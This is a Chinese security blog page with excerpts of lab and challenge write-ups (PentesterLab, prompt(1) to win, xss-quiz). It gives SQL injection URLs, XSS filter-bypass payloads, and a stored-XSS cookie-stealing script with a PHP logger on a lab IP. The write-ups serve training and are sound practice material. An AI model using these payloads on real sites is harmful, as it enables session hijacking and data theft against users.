西风微雨

未曾见过的繁荣以及理想的恢弘,总有一天会和我相遇.

Coding • Exploits • Curious • Sharing
  • Coding

    享受coding带来的快乐,不会编程的hacker不是好hacker,Talk is cheap.

  • Exploits

    漏洞是具有灵魂的,回归漏洞本质,不断的Bypass,安全是一门平衡的艺术.

  • Curious

    keep stupid,永远保持好奇心,这是人生态度,也是一个安全从业者的人生准则.

  • Sharing

    分享是一种帮助自己成长的过程,而不是为了获得他人的认同,不要对分享抱有索取回报的心.

deep

[pentesterLab]XSS and MySQL FILE


作者: 分类: Writeup,网络安全 时间: 2016-05-10 评论: 暂无评论  标签: pentesterlab  浏览:共 231 人围观

0x00.寻找存储型xss
在每篇文章评论框的text区域插入<img src=1 onerror="alert(1)">时发现xss
于是,评论写入:
<script>document.write('<img src="http://192.168.56.101/xss.php?cookie='+document.cookie+' "/>');</script>

192.168.56.101为任意在同一网段的server,我这里为了简便就直接用的被攻击的服务器IP

题目hint说明服务器上有一带有admin/cookie的脚本在不断访问每个页面

xss.php内容:

<?php
$coo=$_GET['cookie'];
$fp=fopen('cook.txt','a');
fwrite($fp,$coo);
fclose($fp);
?>

然后在cook.txt中发现cookie,然后编辑页面cookie

Read More

[pentesterLab]web for pentester I


作者: 分类: Writeup,网络安全 时间: 2016-05-01 评论: 暂无评论  标签: pentesterlab  浏览:共 530 人围观

0x00.sqlInjection part:
example1 payload:

http://192.168.56.101/sqli/example1.php?name=root' union select user(),version(),@@basedir,4,5%23

example2 payload:
过滤空格,换行符%0a绕过,%0b也可以,http://192.168.56.101/sqli/example2.php?name='='直接绕过认证

http://192.168.56.101/sqli/example2.php?name=root'%0aunion%0aselect%0auser(),version(),@@basedir,4,5%23

example3 payload:

http://192.168.56.101/sqli/example3.php?name=root'%0bUNION%0bSELECT%0buser(),version(),@@basedir,4,5%23

example4 payload:

http://192.168.56.101/sqli/example4.php?id=2 and 1=2 union select user(),version(),@@basedir,4,5%23

example5 payload:

http://192.168.56.101/sqli/example5.php?id=2 AND 1=2 UNION select user(),2,3,4,5#

example6 payload:
末尾为数字就行

http://192.168.56.101/sqli/example6.php?id=2 and 1=2 union select user(),2,3,4,5#233

example7 payload:

http://192.168.56.101/sqli/example7.php?id=2%0a and 1=2 union select user(),2,3,4,5#

example8 payload:
example9 payload:
待续

0x01.XSS part

example1 payload:

http://192.168.56.101/xss/example1.php?name=hacker<script>alert(1)</script>

Read More

[pentesterLab] from sql to shell I


作者: 分类: Writeup,网络安全 时间: 2016-05-01 评论: 暂无评论  标签: none  浏览:共 260 人围观

0x01.装好虚拟机,网络设置为host-only模式,ip为192.168.99.100
0x02.常见注入,按流程手工拿用户密码
index.png

Read More

"Prompt(1) to win" payload


作者: 分类: 网络安全 时间: 2015-10-02 评论: 暂无评论  标签: xss  浏览:共 1,204 人围观

0x00.前言
prompt(1) to win是一个xss在线挑战,主要考查如何使xss更短,这里可以参考drops的short xss,其中涉及到比较多的是<svg>神标签的使用,不明白svg是啥的话自行google
0x01.challenges

1题.

  function escape(input) {
            // warm up
            // script should be executed without user interaction
            return '<input type="text" value="' + input + '">';
        } 

什么都没过滤,闭合一下标签

x"><img src=1 onerror=prompt(1)>               //first
"><svg/onload=prompt(1)>                       //second

2题.

function escape(input) {
    // tags stripping mechanism from ExtJS library
    // Ext.util.Format.stripTags
    var stripTagsRE = /<\/?[^>]+>/gi;
    input = input.replace(stripTagsRE, '');

    return '<article>' + input + '</article>';
}

过滤了<>两个标签之间的所有内容,那就不能是标签闭合

<svg/onload=prompt(1) 

3题.

function escape(input) {
    //                      v-- frowny face
    input = input.replace(/[=(]/g, '');

    // ok seriously, disallows equal signs and open parenthesis
    return input;
}   

过滤了=(,那就需要使用unicode编码,=转换为&#61;,(转换为&#40;

<svg><script>prompt&#40;1)</script>

Read More

XSS Challenges payload


作者: 分类: 网络安全 时间: 2015-09-30 评论: 暂无评论  标签: writeup,xss  浏览:共 1,044 人围观

0x00.前言
挑战地址:http://xss-quiz.int21h.jp,初始环境:firefox and IE,由于chrome的XSS filter,chrome下并不能通过测试

0x01.正式挑战

Stage #1 Hint: very simple...

stage#1属于什么都没过滤的情况,那就随便测试几个

<script>alert(document.domain);</script> //first
"><script>alert(document.domain);</script> //second
<img onerror="alert(document.domain);" src=1> //third

Stage #2 Hint: close the current tag and add SCRIPT tag...

stage2输入值被value的双引号包含进去了,所以需要闭合value标签

"><script>alert(document.domain);</script>

Stage #3 Hint: The input in text box is properly escaped.

看了cos的解答并没有明白这题什么意思,我就用了这一招,在地址栏输入

javascript:void(document.forms[0].p2.outerHTML='<img src=1 onerror="alert(document.domain)">');

Stage #4 Hint: invisible input field

stage#4审查元素发现type为hidden的输入框,改为type="text",然后再此框中输入payload,点击search

"><script>alert(document.domain);</script>

Stage #5 Hint: length limited text box

这次是maxlength限制了大小,直接firebug修改大小

" onmouseover="alert(document.domain);" x="

Stage #6 Hint: event handler attributes

与#5相同

" onmouseover="alert(document.domain);" x="

Stage #7 Hint: nearly the same... but a bit more tricky.

随便测试几个<script>发现尖括号被转义成html实体了,因此直接弹框和<img>标签都不奏效了,并且空格可以截断value标签,那就需要onmouseover来辅助了

x onmouseover=alert(document.domain);

Stage #8 Hint: the 'javascript' scheme.

发现这一题是生成link,马上想到了<a>标签里使用javascript:xxx的方式进行点击弹框

javascript:alert(document.domain);

Stage #9 Hint: UTF-7 XSS

搜了下utf7 xss ,@laterain写了篇文章http://lcx.cc/?i=2862,然而我在IE及firefox下均未测试成功,应该否修复这个bug了,直接地址栏输入javascript:alert(document.domain);

Read More

Top ↑